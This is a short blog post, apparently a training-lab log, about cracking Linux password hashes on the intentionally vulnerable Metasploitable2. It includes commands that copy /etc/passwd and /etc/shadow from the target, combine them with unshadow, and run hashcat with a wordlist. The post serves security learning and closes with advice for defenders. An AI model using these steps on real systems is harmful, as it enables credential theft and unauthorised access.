This content originally appeared on DEV Community and was authored by Seif Eldien Ahmad Mohammad

Objective:
Learn and apply the end-to-end process of password cracking on Metasploitable2.

Steps Taken:
“

1. Dump shadow and passwd files

scp msfadmin@:/etc/passwd ./passwd
scp msfadmin@:/etc/shadow ./shadow

2. Combine them into a hash file

unshadow passwd shadow > combined.txt

3. Run Hashcat against the hashes

hashcat -m 500 -a 0 combined.txt /usr/share/wordlists/rockyou.txt
“
Outcome:

Extracted hashes successfully.

Attempted cracking with Hashcat.

Root password did not crack with the default wordlist.

Lessons Learned:

Password cracking requires strong wordlists and sometimes brute-force.

The workflow matters more than the result.

Defenders should always enforce strong passwords and modern hashing algorithms.

Next Steps:

Experiment with custom wordlists.

Try brute-force methods.

Move to the next Red Teaming challenge (DVWA SQL injection).

This content originally appeared on DEV Community and was authored by Seif Eldien Ahmad Mohammad